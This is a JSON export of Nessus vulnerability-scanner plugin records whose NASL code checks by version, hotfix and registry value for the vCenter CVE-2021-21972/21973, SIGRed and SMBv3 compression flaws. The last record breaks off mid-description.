{"nessus": [{"lastseen": "2023-10-15T14:51:24", "description": "The version of VMware vCenter Server installed on the remote host is 6.5 prior to 6.5 U3n, 6.7 prior to 6.7 U3l or 7.0 prior to 7.0 U1c. It is, therefore, affected by multiple vulnerabilities, as follows:\n\n - The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n (CVE-2021-21972)\n\n - The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects: VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). (CVE-2021-21973)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. Nessus has also not tested for the presence of a workaround.", "cvss3": {}, "published": "2021-02-25T00:00:00", "type": "nessus", "title": "VMware vCenter Server 6.5 / 6.7 / 7.0 Multiple Vulnerabilities (VMSA-2021-0002)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_VMSA-2021-0002.NASL", "href": "https://www.tenable.com/plugins/nessus/146826", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146826);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-21972\", \"CVE-2021-21973\");\n script_xref(name:\"IAVA\", value:\"2021-A-0109\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/21\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0012\");\n\n script_name(english:\"VMware vCenter Server 6.5 / 6.7 / 7.0 Multiple Vulnerabilities (VMSA-2021-0002)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is 6.5 prior to 6.5 U3n, 6.7 prior to 6.7 U3l or 7.0\nprior to 7.0 U1c. It is, therefore, affected by multiple vulnerabilities, as follows:\n\n - The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious\n actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the\n underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7\n before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n (CVE-2021-21972)\n\n - The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation\n of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by\n sending a POST request to vCenter Server plugin leading to information disclosure. This affects: VMware vCenter\n Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2\n and 3.x before 3.10.1.2). (CVE-2021-21973)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber. Nessus has also not tested for the presence of a workaround.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0002.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server 6.5 U3n, 6.7 U3l, 7.0 U1c or later or apply the workaround mentioned in the advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21972\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vCenter Server Unauthenticated OVA File Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\nfixes = make_array(\n '6.5', '17590285', # 6.5 U3n\n '6.7', '17137232', # Lower version for 6.7 U3l from https://kb.vmware.com/s/article/2143838\n '7.0', '17327517' # 7.0 U1c\n);\n\nport = get_kb_item_or_exit('Host/VMware/vCenter');\nversion = get_kb_item_or_exit('Host/VMware/version');\nrelease = get_kb_item_or_exit('Host/VMware/release');\n\n# Extract and verify the build number\nbuild = ereg_replace(pattern:\"^VMware vCenter Server [0-9\\\\.]+ build-([0-9]+)$\", string:release, replace:\"\\1\");\nif (build !~ \"^[0-9]+$\") audit(AUDIT_UNKNOWN_BUILD, 'VMware vCenter 6.5 / 6.7 / 7.0');\n\nmatch = pregmatch(pattern:\"^VMware vCenter ([0-9]+\\.[0-9]+).*$\", string:version);\nif (isnull(match)) audit(AUDIT_OS_NOT, 'VMware vCenter 6.5 / 6.7 / 7.0');\n\nver = match[1];\nif (ver !~ \"^(7\\.0|6\\.(5|7))$\") audit(AUDIT_OS_NOT, 'VMware vCenter 6.5 / 6.7 / 7.0');\n\nfixed_build = int(fixes[ver]);\nif (empty_or_null(fixed_build)) audit(AUDIT_VER_FORMAT, ver);\n\nrelease = release - 'VMware vCenter Server ';\nif (build >= fixed_build)\n audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);\n\nreport = '\\n VMware vCenter version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-19T15:00:55", "description": "A server-side request forgery vulnerability exists in the VMware vCenter vSphere HTML5 client due to improper validation of URLs in a vCenter Server plugin. An unauthenticated, remote attacker can exploit this, via HTTPS, leading to information disclosure.", "cvss3": {}, "published": "2022-08-23T00:00:00", "type": "nessus", "title": "VMware vCenter Server SSRF (CVE-2021-21973) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21973"], "modified": "2023-10-16T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-21973.NBIN", "href": "https://www.tenable.com/plugins/nessus/164351", "sourceData": "Binary data vmware_vcenter_cve-2021-21973.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-15T14:51:00", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {}, "published": "2021-02-25T00:00:00", "type": "nessus", "title": "VMware vCenter Server RCE (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-21972.NBIN", "href": "https://www.tenable.com/plugins/nessus/146825", "sourceData": "Binary data vmware_vcenter_cve-2021-21972.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-05T14:29:54", "description": "The remote Windows host is missing a security update. It is, therefore, affected by a remote code execution vulnerability:\n\n - A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the Local System Account. Windows servers that are configured as DNS servers are at risk from this vulnerability. (CVE-2020-1350)\n\nNote: Tenable is testing for the presence of updates which address this issue, as well as Microsoft's recommended mitigation/workaround.\n\nThe registry key being checked for the mitigation is:\n - HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\TcpReceivePacketSize and it is being checked for Microsoft's recommended value of 0xFF00.\n\nOnce in place, the DNS Service must be restarted for the change to take effect.\n\nFor more information, refer to the Microsoft advisory for CVE-2020-1350.", "cvss3": {}, "published": "2020-07-17T00:00:00", "type": "nessus", "title": "Windows DNS Server RCE (CVE-2020-1350)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1350"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JUL_DNS_CHECK.NASL", "href": "https://www.tenable.com/plugins/nessus/138600", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138600);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/08\");\n\n script_cve_id(\"CVE-2020-1350\");\n script_xref(name:\"MSKB\", value:\"4558998\");\n script_xref(name:\"MSKB\", value:\"4565483\");\n script_xref(name:\"MSKB\", value:\"4565503\");\n script_xref(name:\"MSKB\", value:\"4565511\");\n script_xref(name:\"MSKB\", value:\"4565524\");\n script_xref(name:\"MSKB\", value:\"4565529\");\n script_xref(name:\"MSKB\", value:\"4565535\");\n script_xref(name:\"MSKB\", value:\"4565536\");\n script_xref(name:\"MSKB\", value:\"4565537\");\n script_xref(name:\"MSKB\", value:\"4565539\");\n script_xref(name:\"MSKB\", value:\"4565540\");\n script_xref(name:\"MSKB\", value:\"4565541\");\n script_xref(name:\"MSFT\", value:\"MS20-4558998\");\n script_xref(name:\"MSFT\", value:\"MS20-4565483\");\n script_xref(name:\"MSFT\", value:\"MS20-4565503\");\n script_xref(name:\"MSFT\", value:\"MS20-4565511\");\n script_xref(name:\"MSFT\", value:\"MS20-4565524\");\n script_xref(name:\"MSFT\", value:\"MS20-4565529\");\n script_xref(name:\"MSFT\", value:\"MS20-4565535\");\n script_xref(name:\"MSFT\", value:\"MS20-4565536\");\n script_xref(name:\"MSFT\", value:\"MS20-4565537\");\n script_xref(name:\"MSFT\", value:\"MS20-4565539\");\n script_xref(name:\"MSFT\", value:\"MS20-4565540\");\n script_xref(name:\"MSFT\", value:\"MS20-4565541\");\n script_xref(name:\"IAVA\", value:\"2020-A-0299\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/07/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0059\");\n\n script_name(english:\"Windows DNS Server RCE (CVE-2020-1350)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is, \ntherefore, affected by a remote code execution vulnerability:\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System servers when they fail to properly\n handle requests. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the Local System Account. Windows servers\n that are configured as DNS servers are at risk from this\n vulnerability. (CVE-2020-1350)\n\nNote: Tenable is testing for the presence of updates which address this issue, as well as Microsoft's recommended\nmitigation/workaround.\n\nThe registry key being checked for the mitigation is:\n - HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\TcpReceivePacketSize\nand it is being checked for Microsoft's recommended value of 0xFF00.\n\nOnce in place, the DNS Service must be restarted for the change to take effect.\n\nFor more information, refer to the Microsoft advisory for CVE-2020-1350.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6a916fa9\");\n # https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f3307e60\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate security update or mitigation as described in the Microsoft advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1350\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"wmi_enum_server_features.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\", \"SMB/WMI/Available\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\n\nfunction is_dns_server()\n{\n local_var server_features, feature;\n server_features = get_kb_list(\"WMI/server_feature/*\");\n foreach (feature in server_features)\n {\n if ('DNS Server' == feature) return 1;\n }\n return 0;\n}\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-07';\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nmy_os = get_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\nmy_os_build = get_kb_item('SMB/WindowsVersionBuild');\nmy_prod = get_kb_item_or_exit('SMB/ProductName');\nsp = 0;\nvuln = FALSE;\nmitigated = FALSE;\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n## Set kbs and sp\nif(my_os == '6.0' && 'server' >< tolower(my_prod))\n{\n kbs = make_list('4565536','4565529');\n sp = 2;\n}\nelse if(my_os == '6.1' && 'server' >< tolower(my_prod))\n{\n kbs = make_list('4565524','4565539');\n sp = 1;\n}\nelse if(my_os == '6.2' && 'server' >< tolower(my_prod))\n{\n kbs = make_list('4565537','4565535');\n}\nelse if(my_os == '6.3' && 'server' >< tolower(my_prod))\n{\n kbs = make_list('4565541','4565540');\n}\nelse if(my_os == '10' && 'server' >< tolower(my_prod))\n{\n if(my_os_build == '14393') kbs = make_list('4565511');\n else if(my_os_build == '17763') kbs = make_list('4558998');\n else if(my_os_build == '18362') kbs = make_list('4565483');\n else if(my_os_build == '18363') kbs = make_list('4565483');\n else if(my_os_build == '19041') kbs = make_list('4565503');\n}\nelse\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( my_os == '10' )\n{ \n vuln = smb_check_rollup( os:'10',\n sp:0,\n os_build:my_os_build,\n rollup_date:'07_2020',\n bulletin:bulletin,\n rollup_kb_list:kbs\n );\n}\nelse\n{\n vuln = smb_check_rollup( os:my_os, \n sp:sp,\n rollup_date:'07_2020',\n bulletin:bulletin,\n rollup_kb_list:kbs\n );\n}\n\n## Check mitigation\nmitigation_key = 'SYSTEM\\\\CurrentControlSet\\\\Services\\\\DNS\\\\Parameters\\\\TcpReceivePacketSize';\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\npacketsize = get_registry_value(handle:hklm, item:mitigation_key);\nRegCloseKey(handle:hklm);\nclose_registry(close:TRUE);\n\nif (!isnull(packetsize) && (packetsize == 65280))\n mitigated = TRUE;\n\nif(vuln && is_dns_server() && !mitigated)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-05T14:28:58", "description": "According to its self-reported version number, the Microsoft DNS Server running on the remote host is affected by a remote code execution vulnerability. An unauthenticated, remote attacker who successfully exploited the vulnerability could run arbitrary code in the context of the Local System Account.\n\nNote that in order to get the full Microsoft DNS server version, the EnableVersionQuery DNS setting would need to be set to 1.", "cvss3": {}, "published": "2020-07-16T00:00:00", "type": "nessus", "title": "Microsoft DNS Server Remote Code Execution (SIGRed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1350"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "MS_DNS_CVE-2020-1350.NASL", "href": "https://www.tenable.com/plugins/nessus/138554", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138554);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/08\");\n\n script_cve_id(\"CVE-2020-1350\");\n script_xref(name:\"IAVA\", value:\"2020-A-0299\");\n script_xref(name:\"MSKB\", value:\"4558998\");\n script_xref(name:\"MSKB\", value:\"4565483\");\n script_xref(name:\"MSKB\", value:\"4565503\");\n script_xref(name:\"MSKB\", value:\"4565511\");\n script_xref(name:\"MSKB\", value:\"4565524\");\n script_xref(name:\"MSKB\", value:\"4565529\");\n script_xref(name:\"MSKB\", value:\"4565535\");\n script_xref(name:\"MSKB\", value:\"4565536\");\n script_xref(name:\"MSKB\", value:\"4565537\");\n script_xref(name:\"MSKB\", value:\"4565539\");\n script_xref(name:\"MSKB\", value:\"4565540\");\n script_xref(name:\"MSKB\", value:\"4565541\");\n script_xref(name:\"MSFT\", value:\"MS20-4558998\");\n script_xref(name:\"MSFT\", value:\"MS20-4565483\");\n script_xref(name:\"MSFT\", value:\"MS20-4565503\");\n script_xref(name:\"MSFT\", value:\"MS20-4565511\");\n script_xref(name:\"MSFT\", value:\"MS20-4565524\");\n script_xref(name:\"MSFT\", value:\"MS20-4565529\");\n script_xref(name:\"MSFT\", value:\"MS20-4565535\");\n script_xref(name:\"MSFT\", value:\"MS20-4565536\");\n script_xref(name:\"MSFT\", value:\"MS20-4565537\");\n script_xref(name:\"MSFT\", value:\"MS20-4565539\");\n script_xref(name:\"MSFT\", value:\"MS20-4565540\");\n script_xref(name:\"MSFT\", value:\"MS20-4565541\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/07/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0059\");\n\n script_name(english:\"Microsoft DNS Server Remote Code Execution (SIGRed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The DNS server running on the remote host is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Microsoft DNS\nServer running on the remote host is affected by a remote code\nexecution vulnerability. An unauthenticated, remote attacker who\nsuccessfully exploited the vulnerability could run arbitrary code in\nthe context of the Local System Account.\n\nNote that in order to get the full Microsoft DNS server version, the\nEnableVersionQuery DNS setting would need to be set to 1.\");\n # https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?22a53c13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Server 2008, 2008 R2, 2012, 2012 R2, 2016, 2019, version 1903, 1909, and 2004.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1350\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"DNS\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_dns_version.nasl\");\n script_require_keys(\"ms_dns/version\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nkb_ver = 'ms_dns/version';\nversion = get_kb_item_or_exit(kb_ver);\nport = 53;\n\napp_info = vcf::get_app_info(app:'Microsoft DNS server', kb_ver:kb_ver, port:port);\n\nvcf::check_granularity(app_info:app_info, sig_segments:4);\n\nconstraints = [\n # Windows Server 2008\n { 'min_version': '6.0.6003.0', 'fixed_version': '6.0.6003.20885' },\n\n # Windows Server 2008 R2\n { 'min_version': '6.1.7601.0', 'fixed_version': '6.1.7601.24557' },\n\n # Windows Sever 2012\n { 'min_version': '6.2.9200.0', 'fixed_version': '6.2.9200.23084' },\n\n # Windows Sever 2012 R2\n { 'min_version': '6.3.9600.0', 'fixed_version': '6.3.9600.19759' },\n \n # Windows Server 2016\n { 'min_version': '10.0.14393.0', 'fixed_version': '10.0.14393.3808' },\n\n # Windows Server 2019\n { 'min_version': '10.0.17763.0', 'fixed_version': '10.0.17763.1339' },\n\n # Windows Server, version 1903/1909\n # 1903 and 1909 have the same KB\n { 'min_version': '10.0.18362.0', 'fixed_version': '10.0.18362.959' },\n\n # Windows Server, version 2004\n { 'min_version': '10.0.19041.0', 'fixed_version': '10.0.19041.388' }\n\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:57:13", "description": "A remote code execution vulnerability exists in Microsoft Server Message Block 3.1.1 (SMBv3) protocol due to how it handles a maliciously crafted compressed data packet. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands.\n\nNote, the plugin checks if SMB 3.1.1 with compression is enabled. It does not currently verify the vulnerability itself.", "cvss3": {}, "published": "2020-03-11T00:00:00", "type": "nessus", "title": "Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2023-02-23T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_MICROSOFT_WINDOWS_ADV200005_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/134421", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134421);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/23\");\n\n script_cve_id(\"CVE-2020-0796\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0028\");\n\n script_name(english:\"Microsoft Windows SMBv3 Compression RCE (ADV200005)(CVE-2020-0796)(Remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is using a vulnerable version of SMB.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in Microsoft Server Message Block\n3.1.1 (SMBv3) protocol due to how it handles a maliciously crafted compressed\ndata packet. An unauthenticated, remote attacker can exploit this to bypass\nauthentication and execute arbitrary commands.\n\nNote, the plugin checks if SMB 3.1.1 with compression is enabled. It does not\ncurrently verify the vulnerability itself.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?736703d3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has provided additional details and guidance in the ADV200005 advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0796\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SMBv3 Compression Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_dialects_enabled.nasl\");\n script_require_keys(\"SMB/smb_dialect/3.1.1\", \"Settings/ParanoidReport\");\n script_require_ports(139, 445);\n\n exit(0);\n}\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = kb_smb_transport();\n\nif (get_kb_item('SMB/smb_dialect/3.1.1/compression'))\n{\n report = 'Nessus was able to detect SMB 3.1.1 with compression enabled using a specially crafted packet.\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse\n{\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:57:20", "description": "The remote Windows host is missing security update 4551762. It is, therefore, affected by a remote code execution vulnerability. The vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 